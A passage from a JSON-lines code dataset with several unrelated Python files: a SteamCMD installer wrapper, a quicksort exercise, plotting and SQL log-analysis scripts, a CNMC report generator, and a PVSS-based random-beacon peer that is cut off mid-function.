'Darwin':\n platform = 'macos'\n elif platform == 'Linux':\n platform = 'linux'\n elif platform == 'Windows':\n platform = 'windows'\n\n cmd.insert(1, f'+@sSteamCmdForcePlatformType {platform}')\n\n return self.run(cmd)\n\n def cached_login(self, username):\n '''Check if user has a cached login'''\n cmd = [self.exe, '+login', username, '+quit']\n proc = subprocess.run(cmd, stdout=subprocess.PIPE, stdin=subprocess.DEVNULL,\n timeout=5, shell=False)\n\n for line in proc.stdout.decode().split('\\n'):\n if 'Using cached credentials' in line:\n return True\n return False\n\n def info(self, app_id):\n ''''Return app info as dict'''\n cmd = [self.exe, '+login', 'anonymous', '+app_info_update', '1',\n '+app_info_print', str(app_id), '+quit']\n\n out = subprocess.run(cmd, stdout=subprocess.PIPE, shell=False).stdout.decode().split('\\n')\n start, end = 0, 0\n\n # find the start and end of the vdf file from output\n for i, line in enumerate(out):\n if not start and f'\"{app_id}\"' == line:\n start = i\n continue\n elif line == '}':\n end = i\n break\n\n data = '\\n'.join(out[start:end + 1])\n return vdf.loads(data)[str(app_id)]\n\n def install(self):\n '''Install steamcmd'''\n if pf.system() == 'Darwin':\n f = 'steamcmd_osx.tar.gz'\n elif pf.system() == 'Linux':\n f = 'steamcmd_linux.tar.gz'\n elif pf.system() == 'Windows':\n f = 'steamcmd.zip'\n\n base_url = 'https://steamcdn-a.akamaihd.net/client/installer'\n url = f'{base_url}/{f}'\n\n self.directory.mkdir(parents=True, exist_ok=True)\n urlretrieve(url, Path(self.directory, f))\n\n if pf.system() != 'Windows':\n with tarfile.open(Path(self.directory, f)) as tar:\n def is_within_directory(directory, target):\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n tar.extractall(path, members, numeric_owner=numeric_owner) \n\n safe_extract(tar, self.directory)\n else:\n with ZipFile(Path(self.directory, f)) as zipf:\n zipf.extractall(self.directory)\n\n def license(self, app_id, username='anonymous', password='', steam_guard=''):\n '''Check if user has a license for app_id'''\n cmd = [self.exe, '+login', username, password, steam_guard,\n '+licenses_for_app', str(app_id), '+quit']\n\n out = subprocess.run(cmd, stdout=subprocess.PIPE, shell=False).stdout.decode()\n\n for line in out.split('\\n'):\n if 'License packageID' in line:\n return True\n return False\n\n def remove(self):\n '''Remove steamcmd'''\n shutil.rmtree(self.directory)\n\n def run(self, args, username='anonymous', password='', steamguard=''):\n '''Run steamcmd with args and login'''\n args = [self.exe, username, password, steamguard] + args\n return subprocess.run(args, shell=False).returncode\n\n def update(self):\n '''Update steamcmd'''\n return self.run(['+quit'])\n","repo_name":"bubylou/scsm","sub_path":"scsm/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":17701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71810638313","text":"# Uses python3\nimport sys\nimport random\n\ndef partition3(a, l, r):\n x = a[l]\n j = l\n index = [l]\n for i in range(l + 1, r + 1):\n if a[i] < x:\n j += 1 \n a[i], a[j] = a[j], a[i]\n 
if a[i] == x:\n j += 1\n a[i], a[j] = a[j], a[i]\n index.append(j)\n for i in sorted(index, reverse = True):\n a.pop(i)\n count = len(index)\n for i in range(count):\n a.insert(j - count + 1, x)\n return j - count + 1, j\n\ndef partition2(a, l, r):\n x = a[l]\n j = l\n for i in range(l + 1, r + 1):\n if a[i] <= x:\n j += 1\n a[i], a[j] = a[j], a[i]\n a[l], a[j] = a[j], a[l]\n return j\n\n\ndef randomized_quick_sort(a, l, r):\n if l >= r:\n return\n k = random.randint(l, r)\n a[l], a[k] = a[k], a[l]\n m, n = partition3(a, l, r)\n randomized_quick_sort(a, l, m - 1);\n randomized_quick_sort(a, n + 1, r);\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n, *a = list(map(int, input.split()))\n randomized_quick_sort(a, 0, n - 1)\n for x in a:\n print(x, end=' ')\n","repo_name":"Leikvard/Algorithms","sub_path":"sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37473127516","text":"\nimport numpy as np\nfrom random import random\nfrom math import pi, cos, sin, sqrt\nimport matplotlib.pyplot as plt\n\nn_repeat = 10000\n\nxl = []\nyl = []\nfor r in np.linspace(0.001, 3., 100):\n xl.append(r)\n n_good = 0\n for i in range(n_repeat):\n x = random()\n y = random()\n theta = random() * 2*pi\n xx = x + r*cos(theta)\n yy = y + r*sin(theta)\n\n if not (xx > 0 and xx < 1. and yy > 0 and yy < 1.):\n n_good += 1\n yl.append(n_good / n_repeat)\n #yl2.append(min(sqrt(), 1.))\n\n\nplt.plot(xl, yl)\n#plt.plot(xl, yl2)\nplt.show()","repo_name":"GeremWD/raytracing-exp","sub_path":"src/jittered_slope_test.py","file_name":"jittered_slope_test.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28053742815","text":"# !/usr/bin/env python3\n# docstrings (the triple quotation mark method)\n\"\"\"\nThe first line in this file should be your shebang, which specifies\nwhich Python interpreter should be used to run your code .\nThe shebang tells the OS which interpreter to use when your script\nis run directly. For example, if you run `` .\n\"\"\"\n\n# importing DB-API module\nimport psycopg2\n\n# this function for printing result as a table style\n\n\ndef header_style(question, headr1, header2):\n print(\"\\n\\n\"+question+\"\\n\\n\"\n \"------------------------------------+--------------------\\n\"\n \"\\t \"+headr1+\"\\t | \"+header2+\" \\n\"\n \"------------------------------------+--------------------\")\n\n# this is connection function to connect with postgres DB\n\n\ndef conn():\n conn_db_obj = psycopg2.connect(database=\"news\")\n cursor = conn_db_obj.cursor()\n return conn_db_obj, cursor\n\n# the first question function implementation\n\n\ndef question_1():\n # connect with DB\n conn_db_obj, cursor = conn()\n # execute query\n cursor.execute(\"\"\"\n select count(*) as GetAccessTimes ,\n articles.title as ArtName\n from articles inner join log on log.path\n = '/article/' || articles.slug\n where log.status = '200 OK'\n group by ArtName\n order by GetAccessTimes desc limit 3\n \"\"\")\n # fetching all results from database\n results = cursor.fetchall()\n # close connection of database\n conn_db_obj.close()\n # printing the results in table\n header_style('1. 
What are the most popular three articles of all time?',\n 'Articles Name', 'Access Times')\n for GetAccessTimes, ArtName in results:\n print(\"%s | %d\" % (ArtName, GetAccessTimes))\n\n# the second question function implementation\n\n\ndef question_2():\n # connect with DB\n conn_db_obj, cursor = conn()\n # execute query\n cursor.execute(\"\"\"\n select authors.name as authName ,\n count(*) as GetAccessTimes\n from authors inner join articles\n on articles.author = authors.id\n inner join log on log.path\n like concat('%',articles.slug,'%')\n where log.status = '200 OK'\n group by authName\n order by GetAccessTimes desc\n \"\"\")\n # fetching all results from database\n results = cursor.fetchall()\n # close connection of database\n conn_db_obj.close()\n # printing the results in table\n header_style('2. Who are the most popular article authors of all time?',\n 'Author Name', 'Access Times')\n for authName, GetAccessTimes in results:\n print(\"%s \\t\\t | %d\" % (authName, GetAccessTimes))\n\n# the third question function implementation\n\n\ndef question_3():\n # connect with DB\n conn_db_obj, cursor = conn()\n # execute query\n cursor.execute(\"\"\"\n select * from (\n select date(log.time) as day ,\n 100.0 *\n sum(case log.status when '200 OK' then 0 else 1 end)\n /count(date(log.time)) as percentage from log\n group by day ) as virtualTable\n where percentage > 1\n \"\"\")\n # fetching all results from database\n results = cursor.fetchall()\n # close connection of database\n conn_db_obj.close()\n # printing the results in table\n header_style(\"3. On which days did \"\n \"more than 1% of requests lead to errors?\",\n 'Date of Day', 'Percentage')\n for day, percentage in results:\n print(\"%s\\t\\t\\t | %.1f %%\" % (day, percentage))\n\n\n# calling of all of the tree function to get the result\n\n\"\"\" To make sure the main subroutine is\nonly run when this program is executed directly,\nand not when it is imported as a module\"\"\"\nif __name__ == '__main__':\n question_1()\n question_2()\n question_3()\n","repo_name":"Eslam-Ayman/Logs-Analysis-DB","sub_path":"newsSourceCode.py","file_name":"newsSourceCode.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8617876985","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nduniteS2 = pd.read_fwf(\"duniteS2.rho_u.txt\", header=None, skiprows=2)\ndunite2 = pd.read_fwf(\"dunite2.rho_u.txt\", header=None, skiprows=2)\n\n\nduniteS2_densities = []\nduniteS2_minimum_energies = []\nduniteS2_negative_energies_densities = []\nduniteS2_negative_energies = []\nfor row in duniteS2.index:\n density = duniteS2[0][row]\n energy = duniteS2[1][row]\n if density not in duniteS2_densities:\n duniteS2_densities.append(density)\n duniteS2_minimum_energies.append(energy)\n if energy < 0.0:\n duniteS2_negative_energies_densities.append(density)\n duniteS2_negative_energies.append(energy)\n\ndunite2_densities = []\ndunite2_minimum_energies = []\ndunite2_negative_energies_densities = []\ndunite2_negative_energies = []\nfor row in dunite2.index:\n density = dunite2[0][row]\n energy = dunite2[1][row]\n if density not in dunite2_densities:\n dunite2_densities.append(density)\n dunite2_minimum_energies.append(energy)\n if energy < 0.0:\n dunite2_negative_energies_densities.append(density)\n dunite2_negative_energies.append(energy)\n\nax = plt.figure().add_subplot(111)\nax.plot(duniteS2_densities, duniteS2_minimum_energies, linewidth=2.0, color=\"blue\", 
label=\"DuniteS2\")\nax.plot(dunite2_densities, dunite2_minimum_energies, linewidth=2.0, color=\"red\", label=\"Dunite2\")\nax.set_xlabel(\"Density\")\nax.set_ylabel(\"Minimum Energy\")\nax.set_title(\"Density vs. Minimum Energy in Interpolation Files\")\nax.legend()\nax.grid()\n\nax2 = plt.figure().add_subplot(111)\nax2.scatter(duniteS2_negative_energies_densities, duniteS2_negative_energies, linewidth=2.0, color=\"blue\", label=\"DuniteS2\")\nax2.scatter(dunite2_negative_energies_densities, dunite2_negative_energies, linewidth=2.0, color=\"red\", label=\"Dunite2\")\nax2.set_xlabel(\"Density\")\nax2.set_ylabel(\"Negative Energy\")\nax2.set_title(\"Density vs. Negative Energy in Interpolation Files\")\nax2.legend()\nax2.grid()\n\nplt.show()\n\n\n\n","repo_name":"ScottHull/bilinear-interpolation","sub_path":"plot_all_interplation_files.py","file_name":"plot_all_interplation_files.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72340726632","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nimport traceback\nfrom libcnmc.utils import format_f\nfrom libcnmc.core import StopMultiprocessBased\n\n\nclass F13bis(StopMultiprocessBased):\n def __init__(self, **kwargs):\n super(F13bis, self).__init__(**kwargs)\n self.year = kwargs.pop('year', datetime.now().year - 1)\n self.report_name = 'F13 bis - PARCS'\n self.base_object = 'PARCS'\n\n def get_sequence(self):\n # Revisem que estigui actiu\n search_params = [('active', '!=', False)]\n return self.connection.GiscedataParcs.search(\n search_params, 0, 0, False, {'active_test': False})\n\n def get_subestacio(self, sub_id):\n \"\"\"\n Returns the SE data\n :param sub_id: ID of SE\n :type sub_id: int\n :return: Node, Name, CINI and CT-ID of the SE\n :rtype: dict[str,str]\n \"\"\"\n\n o = self.connection\n sub = o.GiscedataCtsSubestacions.read(\n sub_id, ['ct_id', 'cini', 'name', 'node_id']\n )\n ret = {\n \"ct_id\": sub['ct_id'][0],\n \"cini\": sub['cini'],\n \"name\": sub['name']\n }\n if 'node_id' in sub:\n ret[\"node\"] = sub[\"node_id\"][1]\n else:\n bloc_ids = o.GiscegisBlocsCtat.search([('ct', '=', ret[\"ct_id\"])])\n node = ''\n if bloc_ids:\n bloc = o.GiscegisBlocsCtat.read(bloc_ids[0], ['node'])\n node = bloc['node'][1]\n ret[\"node\"] = node\n return ret\n\n def get_tensio(self, parc_id):\n o = self.connection\n tensio_id = o.GiscedataParcs.read(\n parc_id, ['tensio_id'])['tensio_id'][0]\n return o.GiscedataTensionsTensio.read(tensio_id, ['tensio'])['tensio']\n\n def consumer(self):\n o = self.connection\n fields_to_read = [\n 'id', 'subestacio_id', 'name', 'tipus', 'propietari', 'cini'\n ]\n while True:\n try:\n # generar linies\n item = self.input_q.get()\n if item == \"STOP\":\n self.input_q.task_done()\n break\n self.progress_q.put(item)\n parc = o.GiscedataParcs.read(\n item, fields_to_read\n )\n subestacio = self.get_subestacio(parc['subestacio_id'][0])\n o_subestacio = subestacio['name']\n o_parc = parc['name']\n o_node = subestacio['node']\n o_node = o_node.replace('*', '')\n o_cini = parc['cini']\n o_tipus = parc['tipus'] - 1\n tensio = self.get_tensio(parc['id'])\n o_tensio = format_f(\n float(tensio) / 1000.0, decimals=3)\n o_prop = int(parc['propietari'])\n o_any = self.year\n insert = True\n if insert:\n self.output_q.put([\n o_subestacio, # SUBESTACION\n o_parc, # PARQUE\n o_node, # NUDO\n o_cini, # CINI\n o_tipus, # TIPO PARQUE\n o_tensio, # TENSION DEL PARQUE\n o_prop, # PROPIEDAD\n o_any # AÑO INFORMACION\n 
])\n self.input_q.task_done()\n except Exception as e:\n self.input_q.task_done()\n traceback.print_exc()\n if self.raven:\n self.raven.captureException()\n","repo_name":"gisce/libCNMC","sub_path":"libcnmc/cir_4_2015/F13bis.py","file_name":"F13bis.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"73563958632","text":"import sys,os\nimport time\nimport hashlib,random\nfrom node import Node\n# sys.path.insert(0, '..') # Import the files where the modules are located\nimport newjson as json,threading,multiprocessing\nfrom multiprocessing import Process, Manager \nimport zlib, bz2, lzma, base64\n\n\nfrom config import config\n\nID = sys.argv[1]\n\nn=len(config[\"nodes\"])\nf=int((len(config[\"nodes\"]) -1)/3)\n \nip = config[\"nodes\"][ID][\"ip\"]\nport = config[\"portBase\"] + int(ID)\nC_Plen = config[\"C_Plen\"]\nCTs = None\n\n\n\ndef callback(event, mynode, yournode, data):\n global CTs\n if event == \"node_message\": \n # print(data.length)\n tp = data['type']\n rv = json.loads(data['v'])\n epoch = rv['epoch'] \n seq = rv['seq']\n yourid = yournode.id\n # print(\"node:%s recieve type:%s from node:%s\"%(mynode.id, tp, yournode.id), seq, epoch)\n sentProducer = \"sent_%s_%s\"%(tp, seq)\n sentConsumer = \"sent_%s_%s\"%(tp, epoch)\n \n \n\n for tpi in [\"pks\", \"initial\",\"echo\", \"ready\"]:\n \n if tpi not in mynode.msgs:\n mynode.msgs[tpi]={} \n\n if seq not in mynode.msgs[tpi]:\n mynode.msgs[tpi][seq] = {} \n \n if sentProducer not in mynode.msgs:\n mynode.msgs[sentProducer] = False\n\n seqStart = int(seq.split(\"seq_\")[1]) \n\n if tp in [\"pks\", \"initial\",\"echo\", \"ready\"]: \n if tp!=\"pks\":\n mynode.producerRecvSize+=len(str(base64.b64encode(zlib.compress(str(data).encode('utf-8'), 6) + b'zlib'))) \n\n leaderID = seq.split(\"ld_\")[1].split(\"seq_\")[0]\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i ) \n if seqistr not in mynode.msgs[tp]:\n mynode.msgs[tp][seqistr]={}\n\n if tp in [\"recon\", \"reconEcho\", \"reconReady\"]:\n mynode.consumerRecvSize+=len(str(base64.b64encode(zlib.compress(str(data).encode('utf-8'), 6) + b'zlib'))) \n print(tp, len(str(base64.b64encode(zlib.compress(str(data).encode('utf-8'), 6) + b'zlib'))) )\n\n for tpi in [\"recon\", \"reconEcho\", \"reconReady\"]:\n if tpi not in mynode.cis:\n mynode.cis[tpi]={}\n if epoch not in mynode.cis[tpi]:\n mynode.cis[tpi][epoch]={}\n\n if sentConsumer not in mynode.cis:\n mynode.cis[sentConsumer] = False\n\n \n if tp == \"pks\":\n mynode.pvss.setPK(int(yourid), rv['pk'])\n # print(\"node:%s's pks length:%d\"%(mynode.id, len(mynode.pvss.pks)))\n if len(mynode.pvss.pks) == len(config['nodes']): \n time.sleep(10)\n print(\"Node %s producer starts\"%(mynode.id)) \n \n # sv={'C_P': json.loads(json.dumps(mynode.pvss.share(n,f+1)))}\n sv={'C_Ps': [json.loads(json.dumps(mynode.pvss.share(n,f+1))) for i in range(0, C_Plen)]}\n sv['epoch'] = epoch\n sv['ts'] = time.time()\n sv['ts1'] = time.time() \n sv['seq'] = \"ld_%sseq_%d\"%(mynode.id,mynode.seq) \n # mynode.msgs[sentProducer] = True\n hC_Ps = mynode.pvss.hash(sv['C_Ps']) \n for i in range(0, C_Plen):\n seqi = mynode.seq+i \n seqistr = 'ld_%sseq_%d'%(mynode.id,seqi)\n if seqistr not in mynode.msgs[\"initial\"]:\n mynode.msgs[\"initial\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"initial\"][seqistr]:\n mynode.msgs[\"initial\"][seqistr][mynode.id]=sv['C_Ps'][i]\n if seqistr not in mynode.msgs[\"echo\"]:\n 
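# create the ECHO record for this hash; the node's own entry is added just\n                    # below, so it counts toward its own 2f+1 echo quorum\n                    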
mynode.msgs[\"echo\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"echo\"][seqistr]:\n mynode.msgs[\"echo\"][seqistr][mynode.id]=hC_Ps\n\n mynode.seq += C_Plen\n \n mynode.send_to_nodes({\"type\": \"initial\", \"v\": json.dumps(sv)}) \n\n sv['hC_Ps'] = hC_Ps\n del sv['C_Ps']\n mynode.send_to_nodes({\"type\": \"echo\", \"v\": json.dumps(sv)}) \n elif tp == \"initial\":\n \n seqStart = int(seq.split(\"seq_\")[1])\n seqistr=seq\n for i in range(0, C_Plen):\n seqi = seqStart + i \n seqistr = 'ld_%sseq_%d'%(leaderID, seqi)\n mynode.msgs[tp][seqistr][yourid] = rv['C_Ps'][i]\n mynode.pvss.verify(rv['C_Ps'][i][\"C\"], rv['C_Ps'][i][\"proof_sw\"])\n sv = {\"hC_Ps\":mynode.pvss.hash(rv['C_Ps'])} \n sv['epoch'] = epoch\n sv['seq'] = seq \n sv['ts'] = rv['ts']\n sv['ts1'] = time.time()\n seqStart = int(seq.split(\"seq_\")[1])\n # time.sleep(0.2)\n if mynode.sendingCnt > 0:\n time.sleep(mynode.sendingCnt / 500.)\n\n for i in range(0, C_Plen):\n seqi = seqStart + i \n seqistr = 'ld_%sseq_%d'%(leaderID,seqi)\n if seqistr not in mynode.msgs[\"echo\"]:\n mynode.msgs[\"echo\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"echo\"][seqistr]:\n mynode.msgs[\"echo\"][seqistr][mynode.id]=sv['hC_Ps']\n # mynode.msgs[tp][seqistr][yourid] = rv['C_Ps'][i]\n # print(\"%s echo ct= %s at %s\"%(mynode.id, sv['hC_Ps'], sv['seq']), len(mynode.msgs[\"echo\"][seqistr]))\n mynode.send_to_nodes({\"type\": \"echo\", \"v\": json.dumps(sv)}) \n elif tp == \"echo\":\n \n seqStart = int(seq.split(\"seq_\")[1])\n seqistr=seq\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i )\n mynode.msgs[tp][seqistr][yourid] = rv['hC_Ps']\n sv = {\"hC_Ps\":rv['hC_Ps']}\n sv['epoch'] = epoch\n sv['seq'] = seq \n sv['ts'] = rv['ts']\n sv['ts1'] = rv['ts1']\n \n # print(mynode.id, \"recieve echo from\",yourid, seq, rv['hC_Ps'],len(mynode.msgs[\"echo\"][seq]))\n if len(mynode.msgs[\"echo\"][seqistr]) > 2*f or (seqistr in mynode.msgs[\"ready\"] and len(mynode.msgs[\"ready\"][seqistr]) > f): \n if not mynode.msgs[sentProducer]:\n mynode.msgs[sentProducer] = True\n else:\n return \n sv['ts2'] = time.time() \n # time.sleep(0.2) \n if mynode.sendingCnt > 0: \n time.sleep(mynode.sendingCnt / 500) \n \n \n seqStart = int(seq.split(\"seq_\")[1])\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID,seqStart + i )\n if seqistr not in mynode.msgs[\"ready\"]:\n mynode.msgs[\"ready\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"ready\"][seqistr]:\n mynode.msgs[\"ready\"][seqistr][mynode.id]=sv['hC_Ps']\n # print(\"node %s send ready ct: %s\"%(mynode.id, sv['hC_Ps']))\n mynode.send_to_nodes({\"type\": \"ready\", \"v\": json.dumps(sv)}) \n\n elif tp == \"ready\":\n \n # mynode.msgs[tp][seq][yourid] = rv['hC_Ps']\n seqStart = int(seq.split(\"seq_\")[1])\n seqistr=seq\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i )\n mynode.msgs[tp][seqistr][yourid] = rv['hC_Ps']\n\n if len(mynode.msgs[\"ready\"][seqistr]) > 2*f:\n \n if not mynode.msgs[sentProducer]:\n mynode.msgs[sentProducer] = True\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i )\n sentProducer = 'sent_%s_%s'%(tp, seqistr)\n mynode.msgs[sentProducer] = True\n else:\n return\n\n ts = time.time()\n print(\"%s (%s/%s) consensus on %s, initial time: %.2f, echo time: %.2f, ready time: %.2f sendingCnt:%s\"%\\\n ( mynode.id, mynode.curSeq[int(mynode.id)], mynode.seq, seq, ts-rv['ts'], ts-rv['ts1'], ts-rv['ts2'] ,mynode.sendingCnt) )\n # time.sleep(100)\n # print(seq, seqistr, mynode.msgs[tp][seqistr])\n if 
seq.startswith(\"ld_%sseq_\"%(mynode.id)):\n \n while mynode.seq - config[\"C_Ptimes\"]* C_Plen > mynode.curSeq[int(mynode.id)] :\n time.sleep(1)\n\n if CTs == None:\n CTs = [json.loads(json.dumps(mynode.pvss.share(n,f+1))) for i in range(0, C_Plen)] \n # CTs = [json.loads(json.dumps(mynode.pvss.share(n,f+1))) for i in range(0, C_Plen)] \n\n sv={'C_Ps': CTs} \n sv['seq'] = \"ld_%sseq_%d\"%(mynode.id, mynode.seq) \n sv['epoch'] = epoch\n sv['ts'] = time.time()\n sv['ts1'] = time.time()\n hC_Ps = mynode.pvss.hash(sv['C_Ps'])\n for i in range(0, C_Plen):\n seqi = mynode.seq +i \n seqistr = 'ld_%sseq_%d'%(leaderID, seqi)\n if seqistr not in mynode.msgs[\"initial\"]:\n mynode.msgs[\"initial\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"initial\"][seqistr]:\n mynode.msgs[\"initial\"][seqistr][mynode.id]=sv['C_Ps'][i]\n if seqistr not in mynode.msgs[\"echo\"]:\n mynode.msgs[\"echo\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"echo\"][seqistr]:\n mynode.msgs[\"echo\"][seqistr][mynode.id]=hC_Ps\n \n mynode.seq += C_Plen\n mynode.send_to_nodes({\"type\": \"initial\", \"v\": json.dumps(sv)}) \n print(\"node%s start to initial at seq:%s\"%(mynode.id, mynode.seq))\n sv['hC_Ps'] = hC_Ps\n del sv['C_Ps']\n mynode.send_to_nodes({\"type\": \"echo\", \"v\": json.dumps(sv)}) \n elif tp == \"recon\":\n if epoch not in mynode.cis[tp]:\n mynode.cis[tp][epoch] = {} \n mynode.cis[tp][epoch][yourid] = rv['c_i'] \n L = rv['L']\n seq = rv['seq']\n Re_1=rv['Re_1']\n\n \n # print(mynode.id, tp, epoch, len(mynode.cis[tp][epoch]))\n if len(mynode.cis[tp][epoch]) > f:\n if str(L) not in mynode.msgs[\"initial\"][seq]:\n print(\"node %s str(L) not in mynode.msgs['initial'][seq]\"%(mynode.id))\n return\n if not mynode.cis[sentConsumer]:\n mynode.cis[sentConsumer] = True\n else:\n return\n time.sleep(0.05) \n C=mynode.msgs[\"initial\"][seq][str(L)]['C']\n starttime = time.time()\n cis=mynode.cis[tp][epoch].copy()\n gs = mynode.pvss.recon(C, cis)\n \n beaconV = int(mynode.pvss.hash(str(Re_1)+str(gs)))\n\n sv = {\"beaconV\":beaconV} \n sv['epoch'] = epoch \n sv['seq'] = seq\n sv['newepoch'] = rv['newepoch']\n sv['L'] = rv['L'] \n sv['LQ']=rv['LQ']\n sv['Re_1'] = rv['Re_1']\n sv['ts'] = rv['ts']\n sv['ts1'] = rv['ts1']\n sv['ts2'] = time.time()\n # time.sleep(0.05)\n if epoch not in mynode.cis[\"reconEcho\"]:\n mynode.cis[\"reconEcho\"][epoch]={}\n if mynode.id not in mynode.cis[\"reconEcho\"][epoch]:\n mynode.cis[\"reconEcho\"][epoch][mynode.id]=sv['beaconV']\n \n mynode.send_to_nodes({\"type\": \"reconEcho\", \"v\": json.dumps(sv)})\n\n elif tp == \"reconEcho\": \n mynode.cis[tp][epoch][yourid] = rv['beaconV']\n \n flag=False\n if len(mynode.cis[\"reconReady\"][epoch]) > f:\n cis_tp_epoch =mynode.cis[\"reconReady\"][epoch].copy()\n values = {} \n for yid in cis_tp_epoch:\n lqHash = mynode.pvss.hash(cis_tp_epoch[yid])\n if lqHash not in values:\n values[lqHash] = 0\n values[lqHash] += 1\n for lqHash in values:\n if values[lqHash] > f:\n flag=True\n\n \n if len(mynode.cis[tp][epoch]) > 2*f or flag:\n if not mynode.cis[sentConsumer]:\n mynode.cis[sentConsumer] = True\n else:\n return \n time.sleep(0.05) \n sv = {\"beaconV\":rv['beaconV']}\n sv['epoch'] = epoch\n sv['seq'] = seq \n sv['newepoch'] = rv['newepoch'] \n sv['L'] = rv['L'] \n sv['Re_1'] = rv['Re_1'] \n sv['LQ'] = rv['LQ']\n sv['ts'] = rv['ts']\n sv['ts1'] = rv['ts1']\n sv['ts2'] = rv['ts2']\n sv['ts3'] = time.time()\n \n if epoch not in mynode.cis[\"reconReady\"]:\n mynode.cis[\"reconReady\"][epoch]={}\n if mynode.id not in 
mynode.cis[\"reconReady\"][epoch]:\n mynode.cis[\"reconReady\"][epoch][mynode.id]={\"beaconV\":rv['beaconV'],\"LQ\":rv['LQ'],'L':rv['L'], 'Re_1':rv['Re_1'],'newepoch':rv['newepoch']}\n # print(\"node %s send reconReady ct: %s\"%(mynode.id, sv))\n mynode.send_to_nodes({\"type\": \"reconReady\", \"v\": json.dumps(sv)})\n elif tp == \"reconReady\":\n mynode.cis[tp][epoch][yourid] = {\"beaconV\":rv['beaconV'],\"LQ\":rv['LQ'],'L':rv['L'], 'Re_1':rv['Re_1'],'newepoch':rv['newepoch']}\n if len(mynode.cis[tp][epoch]) > 2*f: \n\n cis_tp_epoch =mynode.cis[tp][epoch].copy()\n values = {} \n for yid in cis_tp_epoch:\n lqHash = mynode.pvss.hash(cis_tp_epoch[yid])\n if lqHash not in values:\n values[lqHash] = 0\n values[lqHash] += 1\n\n if values[mynode.pvss.hash(mynode.cis[tp][epoch][yourid])] <= 2*f:\n print(\"node%s reconReady------------------------------------------------------- valid <= 2*f\"%(mynode.id), values[mynode.pvss.hash(mynode.cis[tp][epoch][yourid])])\n return\n\n if not mynode.cis[sentConsumer]:\n mynode.cis[sentConsumer] = True\n else:\n return\n\n if mynode.epoch >= rv['newepoch']:\n print(\"node%s reconReady-------------------------------------------------------mynode.epoch >= rv['newepoch']\"%(mynode.id))\n return\n \n time.sleep(0.05) \n beaconV = rv['beaconV']\n L = rv['L'] \n Re_1 = rv['Re_1']\n mynode.curSeq[L]+=1 \n mynode.LQ.setQueue(list(rv['LQ'])); \n if mynode.LQ.full():\n oldestL = mynode.LQ.get() \n mynode.LQ.put(L) \n mynode.CL={i:True for i in range(1, n+1)}\n for j in mynode.LQ.all():\n if j in mynode.CL:\n del mynode.CL[j]\n keys = list(mynode.CL.keys())\n newL = keys[int(beaconV) % len(mynode.CL)]\n # endtime = time.time()\n \n printStr = \"%s(%s/%s) epoch:%s\"% (mynode.id,mynode.curSeq[int(mynode.id)], mynode.seq, epoch)\n printStr = printStr+ \" Leader%s->%s %s, value: %s %.2fs/2beacon %.2fs %.2fs %.2fs per sendingCnt:%s \"% (L, newL, seq, beaconV%100000,(time.time()-rv['ts'])/mynode.epoch, time.time()-rv['ts1'],time.time()-rv['ts2'],time.time()-rv['ts3'], mynode.sendingCnt)\n printStr = printStr+ \" producer SEND:%.2f\"%(mynode.producerSentSize/(mynode.epoch+(n*config[\"C_Ptimes\"]))/1024.)\n printStr = printStr+ \" producer RCV:%.2f\"%(mynode.producerRecvSize/(mynode.epoch+(n*config[\"C_Ptimes\"]))/1024.)\n printStr = printStr+ \" consumer SEND:%.2f\"%(mynode.consumerSentSize/mynode.epoch/1024.)\n printStr = printStr+ \" consumer RCV:%.2f\"%(mynode.consumerRecvSize/mynode.epoch/1024.)\n \n \n print(printStr)\n \n mynode.Re_1 = beaconV \n mynode.epoch=rv['newepoch']\n mynode.L=L\n mynode.newL = newL\n \nclass Peer(threading.Thread):\n def __init__(self, ID):\n super(Peer, self).__init__()\n self.ID= ID\n self.config = config\n node = Node(ip, port, ID, callback)\n self.node = node\n\n def start(self):\n node = self.node\n self.node.start()\n\n time.sleep(10)\n\n for j in range(int(self.ID)+1, n+1):\n node.connect_with_node(config[\"nodes\"][str(j)][\"ip\"],config[\"portBase\"]+j)\n print(\"Node %s connect %d (%s:%d)\"%(self.ID, j, config[\"nodes\"][str(j)][\"ip\"], config[\"portBase\"]+j)) \n time.sleep(int(ID)/3+10)\n v = {'pk':node.pvss.pk}\n v['epoch'] = -1\n v['seq'] = \"ld_%sseq_%d\"%(self.ID, -1) \n node.send_to_nodes({\"type\": \"pks\", \"v\": json.dumps(v)})\n \n \n keys = list(node.CL.keys())\n node.newL = keys[node.Re_1 % len(node.CL)]\n \n print(node.id, \"choose leader\",node.newL)\n sentDict={}\n \n starttime = time.time()\n\n 